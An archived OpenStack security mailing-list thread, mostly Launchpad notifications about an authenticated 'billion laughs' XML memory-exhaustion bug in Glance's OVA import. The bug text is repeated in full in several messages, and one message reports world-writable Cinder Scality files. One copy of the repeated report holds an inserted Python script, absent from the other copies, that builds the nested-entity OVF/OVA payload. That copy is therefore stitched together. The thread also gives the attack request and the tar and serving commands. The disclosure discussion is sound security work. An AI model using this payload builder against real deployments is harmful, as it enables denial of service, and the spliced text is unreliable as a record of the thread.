Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. 
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB 
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From charles.neill at rackspace.com Thu Sep 29 19:29:36 2016 From: charles.neill at rackspace.com (Charles Neill) Date: Thu, 29 Sep 2016 19:29:36 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160929192936.27974.48991.malone@chaenomeles.canonical.com> I guess what I was trying to get at was, you have to e.g. set usernames/passwords in your configuration files before services relying on Keystone become useful. But I don't think anyone would call defining such variables "non-default" behavior. My uncertainty is this: is "work_dir" usually set by reasonable operators to make Glance work as expected? I imagine that Glance avoids setting a default because 1) it can trigger significant disk usage for whatever folder is selected, and 2) Glance can't always predict what device will be the right one to choose to accommodate that disk usage, so rather than accidentally filling e.g. your /usr/ drive, it forces you to define it yourself. This is similar to services not necessarily specifying defaults for Keystone creds, since it would be unreasonable to assume that "admin/admin" would work by default anyway. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. 
https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. 
(Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. 
Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From ian.cordasco at rackspace.com Thu Sep 29 20:01:01 2016 From: ian.cordasco at rackspace.com (Ian Cordasco) Date: Thu, 29 Sep 2016 20:01:01 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160929200101.23707.85680.malone@gac.canonical.com> > But I don't think anyone would call defining such variables "non- default" behavior. Charles, Glance doesn't require Keystone. That said, configuring the identity service is a far cry from setting up tasks to work. Beyond anecdotal from meetings where operators were asked "Do you use tasks?" and they say "I didn't know that existed" I don't know if operators supply every non-required configuration value. You can also specify a location for glance to store images on the local filesystem, but if people are using ceph, swift, or vmware they're not going to specify that. "It's optional but people fill in optional config values too" isn't sufficient to make this on by default. > Thus the work_dir option may be set by the cloud operator for other reasons as well, not only to import an OVA image. Rahul, every person on this thread associated with Glance has said exactly that. That still doesn't make this on by default (which is the point you and Charles are trying to push). Yes that means people may have a problem with this if they've enabled other tasks. Yes that's exactly what an OSSN would serve to address (educating folks about the potential for attacks by highly trusted users of the cloud if they're using a deprecated API). -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. 
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB 
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From charles.neill at rackspace.com Thu Sep 29 21:09:03 2016 From: charles.neill at rackspace.com (Charles Neill) Date: Thu, 29 Sep 2016 21:09:03 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160929210904.17609.42363.malone@wampee.canonical.com> @Brian: Thanks for the follow-up. I was just trying to figure out whether "work_dir" is commonly enabled by operators or not (which is kind of like asking you to look into an "operator crystal ball", I realize). I know that it must be specified manually, and that it would likely only be enabled if Tasks access was desired - I was just trying to assess whether enabling Tasks is something that happens 10% of the time or 90% of the time. At this point, barring any further comments, it seems the answer is that this is rare. @Ian: We're not trying to push some hidden agenda here. I think my questions have been pretty clear, and focused on one thing: Is this something most reasonable operators enable? I can't quantify this bug's likelihood of impact if I don't at least have a fuzzy answer to that question. My goal was simply to understand how much exposure there is likely to be in the community, and to align the response we make with the actual risk that is presented. Based on what I've seen, an OSSN seems reasonable. 
I bring up Keystone credentials (as used in many OpenStack services - not Glance, specifically) merely as an example of a configuration variable without a default value, but that would not make sense to leave undefined in 90% of situations. Without opinions from people more knowledgeable about Glance than myself, I can't make that determination. My guess is that we are using incompatible definitions of the phrase "by default." My take is, if it enables functionality that most sane operators want/need, and is therefore defined in almost all cases, it is a de-facto default whether or not there is a sane default provided in the service's example configuration file. It seems your definition is "is this specified in the configuration file by default," which I already know the answer to (no). So far I have not received an explicit answer to my question, but as stated above, I guess I have to assume that this means operator usage is not common. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. 
(Optional) If you want to serve this from your devstack instance (as in the
request above), run this in the folder where you created the OVA file:

    $ python -m SimpleHTTPServer 9090

-----------------------------------------
Performance impact
-----------------------------------------

Profiling my VM from a fresh boot:

$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg

Object                                 Metric                       Values
----------                             --------------------         --------------------------------------------
devstack_devstack_1473967678756_60616  Guest/CPU/Load/User:avg      13.00%
devstack_devstack_1473967678756_60616  Guest/RAM/Usage/Free         2456680 kB
devstack_devstack_1473967678756_60616  Guest/Pagefile/Usage/Total   0 kB

After submitting this task twice (repeating calls to the above command):

Object                                 Metric                       Values
----------                             --------------------         --------------------------------------------
devstack_devstack_1473967678756_60616  Guest/CPU/Load/User:avg      84.00%
devstack_devstack_1473967678756_60616  Guest/RAM/Usage/Free         1989684 kB
devstack_devstack_1473967678756_60616  Guest/Pagefile/Usage/Total   0 kB

Object                                 Metric                       Values
----------                             --------------------         --------------------------------------------
devstack_devstack_1473967678756_60616  Guest/CPU/Load/User:avg      88.00%
devstack_devstack_1473967678756_60616  Guest/RAM/Usage/Free         1694080 kB
devstack_devstack_1473967678756_60616  Guest/Pagefile/Usage/Total   0 kB

Object                                 Metric                       Values
----------                             --------------------         --------------------------------------------
devstack_devstack_1473967678756_60616  Guest/CPU/Load/User:avg      83.00%
devstack_devstack_1473967678756_60616  Guest/RAM/Usage/Free         1426876 kB
devstack_devstack_1473967678756_60616  Guest/Pagefile/Usage/Total   0 kB

Object                                 Metric                       Values
----------                             --------------------         --------------------------------------------
devstack_devstack_1473967678756_60616  Guest/CPU/Load/User:avg      79.00%
devstack_devstack_1473967678756_60616  Guest/RAM/Usage/Free         1181248 kB
devstack_devstack_1473967678756_60616  Guest/Pagefile/Usage/Total   0 kB

Object                                 Metric                       Values
----------                             --------------------         --------------------------------------------
devstack_devstack_1473967678756_60616  Guest/CPU/Load/User:avg      85.00%
devstack_devstack_1473967678756_60616  Guest/RAM/Usage/Free         817244 kB
devstack_devstack_1473967678756_60616  Guest/Pagefile/Usage/Total   0 kB

Object                                 Metric                       Values
----------                             --------------------         --------------------------------------------
devstack_devstack_1473967678756_60616  Guest/CPU/Load/User:avg      84.00%
devstack_devstack_1473967678756_60616  Guest/RAM/Usage/Free         548636 kB
devstack_devstack_1473967678756_60616  Guest/Pagefile/Usage/Total   0 kB

Object                                 Metric                       Values
----------                             --------------------         --------------------------------------------
devstack_devstack_1473967678756_60616  Guest/CPU/Load/User:avg      74.00%
devstack_devstack_1473967678756_60616  Guest/RAM/Usage/Free         118932 kB
devstack_devstack_1473967678756_60616  Guest/Pagefile/Usage/Total   0 kB

After submitting enough of these requests at once, glance-api runs out of
memory and can't restart itself.
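For reference, the malicious OVA described in steps 1 and 2 above can be
generated with a short script. The list archive stripped the XML markup from
the payload, so the OVF body produced below is a representative
reconstruction of the classic ten-level "lolN" entity chain (inferred from
the surviving "&lol10;" reference), not necessarily the reporter's exact
file; the laugh.ovf/laugh.ova names mirror the report. Use it only against a
disposable test deployment.

# Representative "billion laughs" OVF/OVA builder (test environments only).
# The entity names (lol .. lol10) and the <Envelope> root element are
# assumptions; only the "&lol10;" reference survives in the archived report.
import tarfile

def billion_laughs_ovf(depth=10, fanout=10):
    # Build the nested-entity DOCTYPE: lol, lol2, ..., lol<depth>, where
    # each level references the previous level <fanout> times.
    entities = ['  <!ENTITY lol "lol">']
    for level in range(2, depth + 1):
        previous = "&lol;" if level == 2 else "&lol%d;" % (level - 1)
        entities.append('  <!ENTITY lol%d "%s">' % (level, previous * fanout))
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE Envelope [\n%s\n]>\n'
        '<Envelope>&lol%d;</Envelope>\n' % ("\n".join(entities), depth)
    )

def build_ova(ovf_name="laugh.ovf", ova_name="laugh.ova"):
    # An OVA is simply a tarball containing the OVF descriptor, so this is
    # equivalent to the "tar -cf" step shown in the report.
    with open(ovf_name, "w") as handle:
        handle.write(billion_laughs_ovf())
    with tarfile.open(ova_name, "w") as tar:
        tar.add(ovf_name)

if __name__ == "__main__":
    build_ova()

Fully expanded, lol10 resolves to roughly a billion copies of "lol", which is
the memory blow-up the profiling below measures.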
Here's what the log looks like after the "killer request" [4]

-----------------------------------------
Mitigation
-----------------------------------------

Any instances of xml.etree should be replaced with their equivalent in a
secure XML parsing library like defusedxml [5]

1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml

-----------------------------------------
Other
-----------------------------------------

Thanks to Rahul Nair from the OpenStack Security Project for bringing the
ovf_process file to my attention in the first place. We are testing Glance
for security defects as part of OSIC, using our API security testing tool
called Syntribos (https://github.com/openstack/syntribos), and Bandit
(which was used to discover this issue).

To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions

From sean_mcginnis at dell.com  Thu Sep 29 21:11:48 2016
From: sean_mcginnis at dell.com (Sean McGinnis)
Date: Thu, 29 Sep 2016 21:11:48 -0000
Subject: [Openstack-security] [Bug 1432003] Re: Files in Scality driver are created world readable/writable
References: <20150313184619.24823.64007.malonedeb@chaenomeles.canonical.com>
Message-ID: <20160929211149.24377.16248.launchpad@soybean.canonical.com>

** Tags added: drivers scality

** Changed in: cinder
   Importance: Undecided => Low

--
You received this bug notification because you are a member of OpenStack
Security, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1432003

Title:
  Files in Scality driver are created world readable/writable

Status in Cinder:
  New
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  On this line in the Scality driver:
  https://github.com/openstack/cinder/blob/master/cinder/volume/drivers/scality.py#L124
  files which are created by the utility function are set to world readable
  and writable. This function is utilized in the following cases:

  - volume creation: https://github.com/openstack/cinder/blob/master/cinder/volume/drivers/scality.py#L156
  - snapshot creation: https://github.com/openstack/cinder/blob/master/cinder/volume/drivers/scality.py#L178
  - volume extension: https://github.com/openstack/cinder/blob/master/cinder/volume/drivers/scality.py#L289

  While it's possible that these files are supposed to be created in a
  directory which is protected, files should always be restricted according
  to the principle of least privilege. If these files are created in a
  directory without restricted permissions, any user on the system can
  tamper with these volumes and snapshots.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1432003/+subscriptions

From ian.cordasco at rackspace.com  Fri Sep 30 12:32:46 2016
From: ian.cordasco at rackspace.com (Ian Cordasco)
Date: Fri, 30 Sep 2016 12:32:46 -0000
Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py
References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com>
Message-ID: <20160930123246.24598.59302.malone@soybean.canonical.com>

> My guess is that we are using incompatible definitions of the phrase "by default."
My take is, if it enables functionality that most sane operators want/need, and is therefore defined in almost all cases, it is a de-facto default whether or not there is a sane default provided in the service's example configuration file. It seems your definition is "is this specified in the configuration file by default," which I already know the answer to (no). Right. I suspect that's why we seem to be talking past each other. "by default" means to me, there's a default in the config file such that this is always on even if the operator doesn't intend it to be. You're asking for the % of operators using this and we have no way of knowing that. > So far I have not received an explicit answer to my question, but as stated above, I guess I have to assume that this means operator usage is not common. As I mentioned above, the only answer I can give you is based on anecdotal evidence of the "Tasks exists?" response from operators. Since this is wide open, you can post this to the openstack-operators list to see if people paying attention there will weigh in. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. 
(Optional) If you want to serve this from your devstack instance (as in the
request above), run this in the folder where you created the OVA file:

    $ python -m SimpleHTTPServer 9090

-----------------------------------------
Performance impact
-----------------------------------------

Profiling my VM from a fresh boot:

$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg

Object                                 Metric                       Values
----------                             --------------------         --------------------------------------------
devstack_devstack_1473967678756_60616  Guest/CPU/Load/User:avg      13.00%
devstack_devstack_1473967678756_60616  Guest/RAM/Usage/Free         2456680 kB
devstack_devstack_1473967678756_60616  Guest/Pagefile/Usage/Total   0 kB

After submitting this task twice (repeating calls to the above command):

Object                                 Metric                       Values
----------                             --------------------         --------------------------------------------
devstack_devstack_1473967678756_60616  Guest/CPU/Load/User:avg      84.00%
devstack_devstack_1473967678756_60616  Guest/RAM/Usage/Free         1989684 kB
devstack_devstack_1473967678756_60616  Guest/Pagefile/Usage/Total   0 kB

Object                                 Metric                       Values
----------                             --------------------         --------------------------------------------
devstack_devstack_1473967678756_60616  Guest/CPU/Load/User:avg      88.00%
devstack_devstack_1473967678756_60616  Guest/RAM/Usage/Free         1694080 kB
devstack_devstack_1473967678756_60616  Guest/Pagefile/Usage/Total   0 kB

